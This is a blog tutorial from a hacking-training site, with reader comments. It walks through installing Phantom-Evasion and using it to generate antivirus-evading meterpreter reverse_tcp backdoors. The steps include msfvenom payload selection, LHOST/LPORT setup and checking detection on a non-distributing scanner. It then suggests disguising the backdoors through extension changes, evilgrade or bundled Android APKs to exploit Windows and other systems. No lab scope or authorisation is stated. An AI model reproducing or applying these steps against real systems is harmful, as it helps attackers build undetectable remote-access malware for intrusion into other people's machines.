• Home
  • Hacking & Security
    • Network Hacking
    • Web Hacking
    • Social Engineering
    • Kali Linux
    Submit An Article
  • Courses
    • All Courses
    • Bundles
    • Masterclass
    • VIP Membership
    • FAQ

    Popular Courses

  • Shop
    • Hardware Bundles
    • Wireless Adapters
    • Pentesting Tools
    • Security
    • Accessories
    • Clothing
    • Books
    • All
  • Competition
  • Services
    Penetration Testing
    Consulting
    Code Review
    One on one Training
    Online Courses
    VPN
  • Blog
      • Cart

    VIP Membership Masterclass
    Got a question?
    [email protected]
    RegisterLogin
    zSecurity
    • Home
    • Hacking & Security
      • Network Hacking
      • Web Hacking
      • Social Engineering
      • Kali Linux
      Submit An Article
    • Courses
      • All Courses
      • Bundles
      • Masterclass
      • VIP Membership
      • FAQ

      Popular Courses

    • Shop
      • Hardware Bundles
      • Wireless Adapters
      • Pentesting Tools
      • Security
      • Accessories
      • Clothing
      • Books
      • All
    • Competition
    • Services
      Penetration Testing
      Consulting
      Code Review
      One on one Training
      Online Courses
      VPN
    • Blog
        • Cart

      Hacking & Security

      Phantom Evasion – Bypassing Anti-Virus and Hacking Windows ,Linux,Mac OS X and Android

      • Posted by Rajneesh Borthakur
      • Date April 24, 2018

      Most of us have heard of msfvenom and metasploit backdoors and have tested them many times. They normally get detected by anti-virus programs such as Windows Defender etc , we also know about a tool Veil-Evasion that generate backdoors that bypass most anti-virus programs. But sometimes backdoors generated by Veil get detected by several AV programs, So we have to use other tools like Empire (click here for a post on how to use Empire). But sometimes the novice learners can find it a bit difficult to use and understand tools like Empire. Alternatively , we can use a tool called Phantom-Evasion to generate Multibyte Xor Encrypted FUD Payloads that are completely invisible to AVs , its easy to install , simple to use and effective.

       

      As Phantom-Evasion is not included in kali , we have to install it separately, but before that , we have to manually install a Windows python interpreter and pyinstaller so that we don’t get the following erros:

      Note : I strongly recommend the 64 bit version of Kali as some dependencies of phantom are not for the 32 bit version , so it may still show errors.

      Step one – Installing a Windows Python interpreter:

      1. Add the i386 architecture , to do this run the following command in your terminal:

      dpkg --add-architecture i386
      apt-get update

      2. Install wine32 and wine64 :

      apt-get install wine32
      apt-get install wine64

      3. now download python installer 2.7.14 from its website :

       wget https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi

      4. Install python in wine :

       wine msiexec /i python-2.7.14.msi

      Ignore the terminal lines , click install for all users,

      Keep clicking next until installed ,click finish at last.

      5. Navigate to the directory where python is installed

      cd /root/.wine/drive_c/Python27

       

      6. Install pip :

      wine python.exe -m pip install pyinstaller

      Done !!! Now that everything is sorted , we can move to install Phantom Evasion without any errors.

       

      Step two – Installing Phantom Evasion:
      1. Optional : change directory to /opt :

      cd /opt

      2. Clone the Phantom project from github :

      git clone https://github.com/oddcod3/Phantom-Evasion.git
      

      3. Now go to Phantom-evasion directory :

      cd Phantom-evasion

      4. Finally run the program and it will automatically install any missing dependencies :

      Note : It will show an option to install monero miner to support the developer , I will leave this choice to you. If you want to do this , then type y and press enter. If you don’t want to , then type n and press enter.

      python phantom-evasion.py

      If everything goes well you should see a screen similar to this : (it may be a little bit different for your first time installation , so don’t panic , if everything shows in green , then you’re good to go )

       

      Using Phantom Evasion:

      Now it will load the tool and you will be able to use it. You can make any kind of backdoors for almost every platform like windows , linux , Mac OS X , android etc. You can also use custom shell code from Veil to make a custom backdoor. Next article coming up on this , stay tuned !!

      Let me show you an example of how this tool works :

      1. Go to the location where you cloned Phantom Evasion, for me its /opt/Phantom-evasion :

      cd /opt/Phantom-evasion

      2. run phantom evasion :

      python phantom-evasion.py

      You will see a screen similar to this :

      3. Select the windows module option 2 as shown in the screenshot and press enter.

      4. Now you will see a screen similar to this , I suggest you experiment with these modules and see which one works best for you, I’m going to select option 4 :

      5. This next screen will show you more details about this module . Press enter to continue.

      6. The next screen will ask you how to supply the shell code , choose option 1 msfvenom for now and press enter.

      7. Now it will ask you to enter the msfvenom payload you want to use .

      eg. if you want to use 32 bit payload , then type windows/meterpreter/reverse_tcp
      if you want to use 64 bit payload , the type windows/x64/meterpreter/reverse_tcp

      8. Set the LHOST (your local IP) and the LPORT (the listening port which you want to receive the connections on).

      8. Now it will ask which encoding to use , select whatever you prefer and hit enter , I would recommend using the 3rd or 4th one for better effectiveness . Also give an output name for your backdoor.

      Finally it will start the encoding and compiling process. Once it is completed , exit phantom and you will find the backdoor in the same phantom directory.

      If you want to check whether its undetectable or not , go to https://nodistribute.com and upload your file and scan it. You will find this :

      Receiving Connections:

      Since the backdoors use msfvenom payloads, you can listen for incoming connections using Metasploit’s multi handler module, this is covered in the 2nd part of following video (fast forward till 9:50):

       

      Now you are ready to use the tool as you probably have got the idea of how to use this tool in general , so you can practice on windows and other platforms as well by generating different backdoors using Phantom Evasion. You can also combine with different attacks by using backdoors created by Phantom with others as evilgrade etc. You can change the extensions and use them to exploit various windows systems. You can also compile backdoors with existing Android APKs and use them with AhMyth (stay tuned for next article). So the possibilities are much more. It depends on you how you use it.

       

      Tag:Antivirus, Bypass, kali, Metasploit, Msfvenom, Veil Evasion

      • Share:
      author avatar
      Rajneesh Borthakur

      Hello !! My name is Rajneesh Borthakur , Just a simple boy of 18 from a small state of India. I always favoured I.T and penetration testing. So I always practiced and tried to Improve on my own a lot. I had to drop out of college(financial reasons) and just decided to study and learn via online. My Dream is to get into the Pentesting and I.T. field and to get an entry level job so that I can excel in it to where I can at least be my own.

      I like to tinker with complicated problems and stuff, and often make something better from them. Apart from learning , pentesting and stuff , I like to make and modify different types of graphic tweaks for PC games with SWeetFX, MasterEffect, ReSHade etc. also I sometimes design digital arts and sci-fi themes using rainmeter and other tools and desktop enhancement widgets for windows.

      To me, Life is all about experimenting and fixing problems and making/improving something new from it. I believe the more we experiment and learn, the less we know, and the more we grow our urge to know .

      Previous post

      How To Secure Wi-Fi Networks From Hackers
      April 24, 2018

      Next post

      How to Discover Device Manufacturer Based on MAC Address
      May 28, 2018

      You may also like

      xss_370x208
      Exploiting Reflected XSS to steal login credentials
      6 February, 2023
      wordpress-pentesting_370x208
      WordPress pentesting
      30 January, 2023
      mimikatz_370x208
      Dump LSASS without Mimikatz via MiniDumpWriteDump!
      19 January, 2023

        5 Comments

      1. Sphiwokuhle
        July 16, 2018
        Log in to Reply

        NoDistribute is not working..

        • Rajneesh Borthakur
          July 17, 2018
          Log in to Reply

          I just checked twice , first it didnot work, at 2nd attempt it worked, so can’t say its working or not …

      2. hammad
        July 21, 2018
        Log in to Reply

        Veil evasion,Fatrat,Empire,phantom,metasploit are not working their backdoors are detected by antivirus i personnaly checked it by making some changes in .bat and .py files but did not get any good results please help
        as i am using esetnod antivirus

      3. Hasanlk99
        June 6, 2020
        Log in to Reply

        can u direct me to use this for android?

      4. Mr.x
        July 9, 2020
        Log in to Reply

        I’m getting problem in installing wine
        Wine: Depends: wine64 (>=5.0-4) but it is not going to be installed or wine32 (>=5.0-4)
        Depends: wine64(< 5.0-4.1~) but it is not going to be installed or wine32 (5.0-4.1~)

      Leave A Reply Cancel reply

      You must be logged in to post a comment.

      Categories

      • Cryptography
      • Cryptography
      • CTF
      • Forensics
      • Hacking & Security
      • Hardware
      • IOT
      • Kali Linux
      • Network Hacking
      • News
      • OSINT
      • Post Exploitation
      • Post Exploitation
      • Privacy
      • Programming
      • Security
      • Social Engineering
      • Uncategorized
      • Web Hacking

      Popular Posts

      Got a Blank Screen After Importing Kali in Virtual Box ? Here’s How To Fix It
      25Jan2018

      Connect with us

      • Facebook
      • Twitter
      • LinkedIn
      • Instagram
      • Youtube

      “Everything related to ethical hacking

      & cyber security in one place.”

      Quick Links

      • Home
      • About Us
      • Hacking & Security
      • Download Custom Kali
      • Contact
      • FAQ

      Services

      • Penetration Testing
      • Consulting
      • Code Review
      • One on one training
      • VPN
      • VIP Membership

      Company

      • About Us
      • Contact
      • Vulnerability Disclosure

      Support

      • FAQ
      • Forums

      Copyright © 2022 Z IT SECURITY LTD t/a zSecurity. All rights reserved.

      • Privacy
      • Shipping
      • Refunds
      • Terms

      Contribute

      Share your knowledge with the world

      SUBMIT AN ARTICLE

      Login with your site account

      Lost your password?

      Not a member yet? Register now

      Register a new account


      Are you a member? Login now

      Enroll in this course to access this lesson!

      All of our courses include:

      ✔ Lifetime, unlimited access to course materials & training videos.

      ✔ Watch online or download lectures for offline use.

      ✔ Verifiable certificate of completion from zSecurity, signed by the course instructor, Zaid.

      ✔ Get answers from our Support Team within a maximum of 15 hours.

      ✔ Unlimited Updates.

      Get free 1 month VIP membership per course with:

      ✔ Live mentorship and Q&A session with the course instructor, Zaid.

      ✔ Instant support from community members through our private discord channel.

      ✔ Daily updates with the latest tutorials & news in the hacking world.

      ✔ Daily resources like CTFs, bug bounty programs, onion services and more!

      ✔ Access our VIP community & connect with like-minded people.

      ✔ Discounts on other zSecurity products and services.

      We are using cookies to give you the best experience on our website. This includes but is not limited to:

      • Storing your settings and preferences.
      • Remember your access information
      • Track website performance and make our website more relevant to you.

      You can find out more about which cookies we are using or switch them off in settings.

      Privacy Overview

      This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.

      Strictly Necessary Cookies

      Strictly Necessary Cookie should be enabled at all times so that we can save your preferences for cookie settings.

      3rd Party Cookies

      This website uses Google Analytics and Linkedin to collect anonymous information such as the number of visitors to the site, and the most popular pages.

      Keeping this cookies enabled helps us to improve our website.

      Please enable Strictly Necessary Cookies first so that we can save your preferences!

      Powered by  GDPR Cookie Compliance